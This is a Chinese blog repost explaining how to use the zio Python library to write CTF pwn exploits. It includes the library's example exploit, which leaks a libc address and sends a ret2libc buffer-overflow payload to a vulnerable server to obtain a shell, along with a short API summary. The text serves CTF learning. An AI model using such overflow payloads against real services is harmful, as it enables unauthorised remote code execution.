CTF中的EXP编写技巧 zio库的使用

最新推荐文章于 2024-04-26 12:01:11 发布
最新推荐文章于 2024-04-26 12:01:11 发布
阅读量603 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/Ox9A82/p/5475815.html
版权

zio库没有提供文档

这个是官方给出的一个例子程序

 1 from zio import *
 2 io = zio('./buggy-server')
 3 # io = zio((pwn.server, 1337))
 4 
 5 for i in xrange(1337):
 6     io.writeline('add ' + str(i))
 7     io.read_until('>>')
 8 
 9 io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
10 io.read_until('A' * 49)
11 libc_base = l32(io.read(4)) - 0x1a9960
12 libc_system = libc_base + 0x3ea70
13 libc_binsh = libc_base + 0x15fcbf
14 payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
15 io.write('info ' + payload + "\nshow\nexit\n")
16 io.read_until(">>")
17 # We've got a shell;-)
18 io.interact()

可以做本地和远程的切换

 1 from zio import *
 2 
 3 if you_are_debugging_local_server_binary:
 4     io = zio('./buggy-server')            # used for local pwning development
 5 elif you_are_pwning_remote_server:
 6     io = zio(('1.2.3.4', 1337))           # used to exploit remote service
 7 
 8 io.write(your_awesome_ropchain_or_shellcode)
 9 # hey, we got an interactive shell!
10 io.interact()

总结一下

zio (('127.0.0.1',3389), timeout = 9999)

连接到ip的端口

zio('./pwn1') 加载本地文件

 

writeline('abc') 发送字符串

write(‘abc') 发送字符串

 

read_until('hello') 直到收到字符串

read(4) 接收

l32()   4byte

l64()   8byte

interact()与shell交互

转载于:https://www.cnblogs.com/Ox9A82/p/5475815.html

weixin_30496431
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zio-process:一个简单的ZIO,用于与外部流程和命令行程序进行交互
02-13
齐奥过程 | 概括 基于ZIO的纯功能命令和过程。 文献资料 贡献 行为守则 参见 支持 来和我们聊天 。 执照
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3085
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
POC&EXP编写EXP编写实战(1)
最新发布
剁椒鱼头没剁椒的博客
04-26 566
通过上一篇文章的了解,应该都了解了POC是怎么编写的,而且POC和EXP的区别就是POC只能验证漏洞,简单来说就是通过判断特定的响应值来判断是否存在漏洞,而且EXP就需要将响应的内容给返回回来,但是整体在编写的时候基本上都差不多!关于用的模块或者参数除非是前面没了解过的,否则不再进行赘述,请查看前面的文章!整体来说,当你编写一个POC或EXP后,后续的编写基本上都是套模板,除非遇到一些很复杂的漏洞,可能需要修改很多内容,否则一般的漏洞基本上就是修改模板。
CTF-Internetwache2016-exp-RemotePrinter
iextract的博客
04-22 424
CTF-Internetwache2016-exp-RemotePrinter 自今天开始在csdn记录下有些感想或是某些解题过程。以前只在csdn查询、下载资料,没有想到记录。 Ps:心态爆炸,这个笔记本动一下卡7秒是什么鬼哦查看给出的二进制文件,file RemotePrinter check.sh --file RemotePrinter RemotePrinter: ELF 3
某比赛渗透测试阶段后门的EXP
热门推荐
单核CPU的小朋友的博客
11-19 3万+
由于最近有人问我要上次后门的exp,所以我今天就写了一份。 使用了python的pwn模块。没有的小伙伴们可以使用命令安装一下 pip install pwn 主要思路还是根据后门返回结果来写。使用remote函数来连接后门,具体操作和南邮CTF的PWN题的exp也差不多,只是多了些返回结果而已。需要多做一些操作。我写顺便放出getflag.c的源码,以便各位测试使用。 getflag.c #...
基于zio编写PWN代码
ChuMeng1999的博客
12-09 1986
目录预备知识一、CTF PWN基础知识二、zio简介1.导入zio2.与远程服务器建立网络连接3.从远程服务器读取数据4.向远程服务器发送数据5.与服务器建立shell交互三、pip四、checksec脚本实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、CTF PWN基础知识 《CTF PWN进阶训练》系列实验要求实验者已经了解如下相关的基础知识,包括: 1.理解基本的汇编指令及语句; 2.掌握IDA Pro的基本用法; 3.熟悉网络编程(socket)基本原理; 4.编写简单的Python
CTF超详细资源合集
06-14
在传统的CTF线上⽐赛,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问题,不需具特别强的编程能⼒,故⼊门较为容易。Web类题⽬常见的漏洞类型...
CTF理论考核题及答案 ctf
02-21
CTF理论考核题及答案 ctf 1.readme.txt哪一部分是扩展名 A、readme B、readme. C、.txt D、me.txt 参考答案:C 2.关于html语言,描述错误的有 A、html语言不区分大小写 B、浏览器可以直接解释执行html代码 C...
网络安全选择题题 ctf 63w字
07-19
网络安全选择题题,全文共63w字,文件内容较多,打开可能会慢一些,等待即可,全文包括较多网络安全知识,对ctf比赛的选择题进行了部分汇总和整理
工匠杯-CTF(题目+exp+解题思路)
04-01
在解题模式CTF赛制,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、...
CTF解题思路.xls
01-25
CTF解题思路
2021-07-25
m0_57291352的博客
07-25 703
[XNUCA2018]Warmup 题目 Buggy_Server.py from Crypto.Util.number import bytes_to_long, getPrime from random import randint from gmpy2 import powmod import sys p = getPrime(1024) q = getPrime(1024) N = p*q Phi = (p-1)*(q-1) with open("flag", 'r') as fr: flag
POC-EXP编写
weixin_44110913的博客
08-18 3084
文章目录POC一.概念二.思维图解三.代码演示EXP一.概念二.思维图解三.代码演示 POC 一.概念 漏洞刚被批漏之后,有时候现有的工具里面是没有相应的poc的,那我们可以根据原理写出对应的poc代码,验证漏洞是否存在。 作用:用于漏洞验证,更加高效的快速挖掘漏洞,而不是手工测试,节省时间。 二.思维图解 深入了解漏洞原理 拼接payload到url或者header头和cookies(大多数情况都这样) 发起请求 通过响应头判断间件和脚本版本 根据其漏洞特征,判断该漏洞是否存在 三.代码演示
exp编写
qq_74378387的博客
03-21 311
在https://www.exploit-db.com/ 漏洞里面 每天都可以很多新的漏洞发布。可是新的漏洞很多漏洞发布者 ,都是只给代码漏洞部分,更多的是没有详细的分析。更别说是漏洞利用程序了。掌握漏洞编写的技能,随心所欲地编写漏洞利用程序,不仅能简化测试过程,而且可以让漏洞程序多种多样满足我们的需要。一般的们多数接触的是WEB安全漏洞 (Web Application Exploits)这类较多。一般只需理解和掌握http协议即可。简单的html基础也可以编写EXP了。
探索ZIO:一款强大的Scala异步
gitblog_00009的博客
04-12 313
探索ZIO:一款强大的Scala异步 项目地址:https://gitcode.com/xoofx/zio 在现代软件开发,处理异步编程是不可或缺的一部分。特别是对于Scala开发者来说,ZIO提供了一种优雅、类型安全的方式来管理并发和副作用。本文将带你深入理解ZIO,探讨它的技术原理、应用场景以及显著特点,让你更好地利用它提升你的开发效率。 项目简介 ZIO(ZPure Input/Out...
zio(pwn)
weixin_51758733的博客
07-19 100
zio
exp编写技巧
m0_49959202的博客
09-20 2893
文章目录exp编写技巧1.代码对齐2. 填充为指定长度3. 链接远程服务器或者链接本地文件4. 格式转换5. 环境变量6. 获得汇编指令的机器代码7. 把权限交给用户8. shellcode9. ELF 操作ELF文件的工具11.接收数据12.发送数据13.填充字符,字符串向右/向左填充14.寻找ROP15.使用flat()函数来格式化payload16.gdb调试exp17.泄露libc常用函数18.获取libc版本方法19.寻找文件字符串20.栈溢出确定偏移量方法20.1 方法一:gdb手工计算20
poc, vul, exp都是什么意思呢?
ly969434341的专栏
05-04 8330
poc, vul, exp都是什么意思呢? 转自:https://www.zhihu.com/question/26053378 答:poc:proof of concept :漏洞的概念证明 vul:vulnerable:漏洞 expexploit:漏洞利用,一般是个demo程序...
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5496
一、安全名词1. POCPOC,Proof ofConcept,⽂意思是“观点证明”。这个短语会在漏洞报告使⽤,漏洞报告的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXPExploit,文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
CTF逆向分析技巧:从隐写到虚拟机调试
这些技巧和经验展示了在CTF比赛成功解决二进制问题的关键步骤,包括选择合适的工具,熟悉虚拟化环境的使用,以及如何应对包含隐藏信息或复杂保护机制的文件。通过学习和实践这些方法,参赛者可以提升在CTF比赛...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值